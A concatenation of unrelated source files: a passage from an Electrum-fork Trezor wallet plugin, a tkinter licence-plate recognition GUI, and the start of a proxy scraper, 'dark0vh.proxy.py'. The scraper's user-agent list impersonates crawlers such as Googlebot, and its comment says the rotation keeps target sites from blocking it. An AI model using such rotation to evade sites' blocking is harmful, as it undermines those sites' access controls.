if client:
client.used()
return client
def get_coin_name(self):
return "MTNS Testnet" if constants.net.TESTNET else "OmotenashiCoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 24: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
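# Rough illustration (hypothetical xpub elided): for a multisig cosigner xpub and a
# receive address at relative index 5, _make_node_path(xpub, [0, 5]) wraps the parsed
# BIP32 node together with the relative path [0, 5], so the device derives the
# cosigner pubkey itself instead of being handed a raw key.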
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
client.get_xpub('m', 'standard', creating=is_creating_wallet)
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx, xpub_path) for txhash, tx in prev_tx.items() }
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, xpub_path, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
details = SignTx(lock_time=tx.locktime, version=tx.version)
signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for _, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx, xpub_path, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
xpubs = [parse_xpubkey(x) for x in x_pubkeys]
multisig = self._make_multisig(txin.get('num_sig'), xpubs, txin.get('signatures'))
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
# find which key is mine
for xpub, deriv in xpubs:
if xpub in xpub_path:
xpub_n = parse_path(xpub_path[xpub])
txinputtype.address_n = xpub_n + deriv
break
prev_hash = bfh(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs, signatures=None):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
if signatures is None:
signatures = [b''] * len(pubkeys)
elif len(signatures) != len(pubkeys):
raise RuntimeError('Mismatched number of signatures')
else:
signatures = [bfh(x)[:-1] if x else b'' for x in signatures]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=signatures,
m=m)
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
deriv = parse_path("/%d/%d" % index)
multisig = self._make_multisig(m, [(xpub, deriv) for xpub in xpubs])
txoutputtype = TxOutputType(
multisig=multisig,
amount=amount,
address_n=parse_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx, xpub_path):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
t.inputs = self.tx_inputs(tx, xpub_path)
t.bin_outputs = [
TxOutputBinType(amount=vout['value'], script_pubkey=bfh(vout['scriptPubKey']))
for vout in d['outputs']
]
return t
|
surface.py
|
"""
@ Author : Jimeng Shi
@ Date : 1/23/2021
@ FileName : surface.py
"""
import tkinter as tk
from tkinter.filedialog import *
from tkinter import ttk
from tkinter import messagebox as mBox
import predict
import cv2
from PIL import Image, ImageTk
import threading
import time
class Surface(ttk.Frame):
pic_path = " "
view_high = 600
view_wide = 600
update_time = 0
thread = None
thread_run = False
camera = None
color_transform = {"green": ("绿牌", "#55FF55"), "yello": ("黄牌", "#FFFF00"), "blue" : ("蓝牌", "#6666FF")}
def __init__(self, win):
ttk.Frame.__init__(self, win)
frame_left = ttk.Frame(self)
frame_right1 = ttk.Frame(self)
frame_right2 = ttk.Frame(self)
win.title("车牌识别")
win.state("zoomed")
self.pack(fill=tk.BOTH, expand=tk.YES, padx="5", pady="5")
frame_left.pack(side=LEFT, expand=1, fill=BOTH)
frame_right1.pack(side=TOP, expand=1, fill=tk.Y)
frame_right2.pack(side=RIGHT, expand=0)
ttk.Label(frame_left, text='原图:').pack(anchor="nw")
ttk.Label(frame_right1, text='车牌位置:').grid(column=0, row=0, sticky=tk.W)
from_pic_ctl = ttk.Button(frame_right2, text="来自图片", width=20, command=self.from_pic)
from_vedio_ctl = ttk.Button(frame_right2, text="来自摄像头", width=20, command=self.from_vedio)
self.image_ctl = ttk.Label(frame_left)
self.image_ctl.pack(anchor="nw")
self.roi_ctl = ttk.Label(frame_right1)
self.roi_ctl.grid(column=0, row=1, sticky=tk.W)
ttk.Label(frame_right1, text='识别结果:').grid(column=0, row=2, sticky=tk.W)
self.r_ctl = ttk.Label(frame_right1, text="")
self.r_ctl.grid(column=0, row=3, sticky=tk.W)
self.color_ctl = ttk.Label(frame_right1, text="", width="20")
self.color_ctl.grid(column=0, row=4, sticky=tk.W)
from_vedio_ctl.pack(anchor="se", pady="5")
from_pic_ctl.pack(anchor="se", pady="5")
self.predictor = predict.CardPredictor()
self.predictor.train_svm()
def get_imgtk(self, img_bgr):
img = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2RGB)
im = Image.fromarray(img)
imgtk = ImageTk.PhotoImage(image=im)
wide = imgtk.width()
high = imgtk.height()
if wide > self.view_wide or high > self.view_high:
wide_factor = self.view_wide / wide
high_factor = self.view_high / high
factor = min(wide_factor, high_factor)
wide = int(wide * factor)
if wide <= 0 : wide = 1
high = int(high * factor)
if high <= 0 : high = 1
im = im.resize((wide, high), Image.ANTIALIAS)
imgtk = ImageTk.PhotoImage(image=im)
return imgtk
def show_roi(self, r, roi, color):
if r :
roi = cv2.cvtColor(roi, cv2.COLOR_BGR2RGB)
roi = Image.fromarray(roi)
self.imgtk_roi = ImageTk.PhotoImage(image=roi)
self.roi_ctl.configure(image=self.imgtk_roi, state='enable')
self.r_ctl.configure(text=str(r))
self.update_time = time.time()
try:
c = self.color_transform[color]
self.color_ctl.configure(text=c[0], background=c[1], state='enable')
except:
self.color_ctl.configure(state='disabled')
elif self.update_time + 8 < time.time():
self.roi_ctl.configure(state='disabled')
self.r_ctl.configure(text="")
self.color_ctl.configure(state='disabled')
def from_vedio(self):
if self.thread_run:
return
if self.camera is None:
self.camera = cv2.VideoCapture(0)
if not self.camera.isOpened():
mBox.showwarning('Warn!', 'Fail to open camera!')
self.camera = None
return
self.thread = threading.Thread(target=self.vedio_thread, args=(self,))
self.thread.setDaemon(True)
self.thread.start()
self.thread_run = True
def from_pic(self):
self.thread_run = False
self.pic_path = askopenfilename(title="选择识别图片", filetypes=[("image", ".jpg"), ("image", ".png")])
if self.pic_path:
img_bgr = predict.imreadex(self.pic_path)
self.imgtk = self.get_imgtk(img_bgr)
self.image_ctl.configure(image=self.imgtk)
resize_rates = (1, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4)
for resize_rate in resize_rates:
print("resize_rate:", resize_rate)
r, roi, color = self.predictor.predict(img_bgr, resize_rate)
if r:
break
#r, roi, color = self.predictor.predict(img_bgr, 1)
self.show_roi(r, roi, color)
@staticmethod
def vedio_thread(self):
self.thread_run = True
predict_time = time.time()
while self.thread_run:
_, img_bgr = self.camera.read()
self.imgtk = self.get_imgtk(img_bgr)
self.image_ctl.configure(image=self.imgtk)
if time.time() - predict_time > 2:
r, roi, color = self.predictor.predict(img_bgr)
self.show_roi(r, roi, color)
predict_time = time.time()
print("run end")
def close_window():
print("destroy")
if surface.thread_run :
surface.thread_run = False
surface.thread.join(2.0)
win.destroy()
if __name__ == '__main__':
win = tk.Tk()
surface = Surface(win)
win.protocol('WM_DELETE_WINDOW', close_window)
win.mainloop()
|
dark0vh.proxy.py
|
import urllib.request
import re
import random
from bs4 import BeautifulSoup
import threading
# list of user agents to rotate through, so the target sites do not block us for making too many requests
useragents=["AdsBot-Google ( http://www.google.com/adsbot.html)",
"Avant Browser/1.2.789rel1 (http://www.avantbrowser.com)",
"Baiduspider ( http://www.baidu.com/search/spider.htm)",
"BlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103",
"BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/5.0.3.3 UP.Link/5.1.2.12 (Google WAP Proxy/1.0)",
"BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0",
"BlackBerry8320/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/100",
"BlackBerry8330/4.3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105",
"BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102",
"BlackBerry9530/4.7.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 UP.Link/6.3.1.20.0",
"BlackBerry9700/5.0.0.351 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/123",
"Bloglines/3.1 (http://www.bloglines.com)",
"CSSCheck/1.2.2",
"Dillo/2.0",
"DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"DoCoMo/2.0 SH901iC(c100;TB;W24H12)",
"Download Demon/3.5.0.11",
"ELinks/0.12~pre5-4",
"ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33)",
"ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41)",
"EmailWolf 1.00",
"everyfeed-spider/2.0 (http://www.everyfeed.com)",
"facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)",
"FAST-WebCrawler/3.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler)",
"FeedFetcher-Google; ( http://www.google.com/feedfetcher.html)",
"Gaisbot/3.0 (robot@gais.cs.ccu.edu.tw; http://gais.cs.ccu.edu.tw/robot.php)",
"Googlebot/2.1 ( http://www.googlebot.com/bot.html)",
"Googlebot-Image/1.0",
"Googlebot-News",
"Googlebot-Video/1.0",
"Gregarius/0.5.2 ( http://devlog.gregarius.net/docs/ua)",
"grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org)",
"Gulper Web Bot 0.2.4 (www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot)",
"HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0",
"HTMLParser/1.6",
"iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2)",
"iTunes/9.0.2 (Windows; N)",
"iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)",
"Java/1.6.0_13",
"Jigsaw/2.2.5 W3C_CSS_Validator_JFouffa/2.0",
"Konqueror/3.0-rc4; (Konqueror/3.0-rc4; i686 Linux;;datecode)",
"LG-GC900/V10a Obigo/WAP2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1",
"LG-LX550 AU-MIC-LX550/2.0 MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"libwww-perl/5.820",
"Links/0.9.1 (Linux 2.4.24; i386;)",
"Links (2.1pre15; FreeBSD 5.3-RELEASE i386; 196x84)",
"Links (2.1pre15; Linux 2.4.26 i686; 158x61)",
"Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)",
"Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12",
"Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d",
"Mediapartners-Google",
"Microsoft URL Control - 6.00.8862",
"Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2) ",
"MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8.65 [it] UP.Link/6.3.0.0.0",
"MOT-V177/0.1.75 UP.Browser/6.2.3.9.c.12 (GUI) MMP/2.0 UP.Link/6.3.1.13.0",
"MOT-V9mm/00.62 UP.Browser/6.2.3.4.c.1.123 (GUI) MMP/2.0",
"Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1",
"Mozilla/2.02E (Win95; U)",
"Mozilla/2.0 (compatible; Ask Jeeves/Teoma)",
"Mozilla/3.01Gold (Win95; I)",
"Mozilla/3.0 (compatible; NetPositive/2.1.1; BeOS)",
"Mozilla/4.0 (compatible; GoogleToolbar 4.0.1019.5266-big; Windows XP 5.1; MSIE 6.0.2900.2180)",
"Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.0 (screen 600x800)",
"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; MDA Pro/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1)",
"Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1)",
"Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0 )",
"Mozilla/4.0 (compatible; MSIE 6.0; j2me) ReqwirelessWeb/3.5",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; winfx; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0) ",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
"Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0",
"Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
"Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;452) Opera 6.20 [en-US]",
"Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30)",
"Mozilla/4.8 [en] (Windows NT 5.1; U)",
"Mozilla/4.8 [en] (X11; U; SunOS; 5.7 sun4u)",
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060702 SeaMonkey/1.5a",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1 (KHTML, Like Gecko) Version/6.0.0.141 Mobile Safari/534.1",
"Mozilla/5.0 (compatible; bingbot/2.0 http://www.bing.com/bingbot.htm)",
"Mozilla/5.0 (compatible; Exabot/3.0; http://www.exabot.com/go/robot) ",
"Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)",
"Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;",
"Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.30-7.dmz.1-liquorix-686; X11) KHTML/3.5.10 (like Gecko) (Debian package 4:3.5.10.dfsg.1-1 b1)",
"Mozilla/5.0 (compatible; Konqueror/3.5; Linux; en_US) KHTML/3.5.6 (like Gecko) (Kubuntu)",
"Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.1 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.1; DragonFly) KHTML/4.1.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.1; OpenBSD) KHTML/4.1.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.2; Linux) KHTML/4.2.4 (like Gecko) Slackware/13.0",
"Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.1 (like Gecko) Fedora/4.3.1-3.fc11",
"Mozilla/5.0 (compatible; Konqueror/4.4; Linux 2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu",
"Mozilla/5.0 (compatible; Konqueror/4.4; Linux) KHTML/4.4.1 (like Gecko) Fedora/4.4.1-1.fc12",
"Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.5; NetBSD 5.0.2; X11; amd64; en_US) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; WOW64; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)",
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
"Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13",
"Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0",
"Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
"Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/531.22.7",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; de-de) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8F190",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3",
"Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20",
"Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C145",
"Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522 (KHTML, like Gecko) Safari/419.3",
"Mozilla/5.0 (Linux; U; Android 1.0; en-us; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 1.1; en-gb; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 1.5; de-ch; HTC Hero Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; de-de; HTC Magic Build/PLAT-RC33) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 FirePHP/0.3",
"Mozilla/5.0 (Linux; U; Android 1.5; en-gb; T-Mobile_G2_Touch Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; htc_bahamas Build/CRB17) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; sdk Build/CUPCAKE) AppleWebkit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; SPH-M900 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
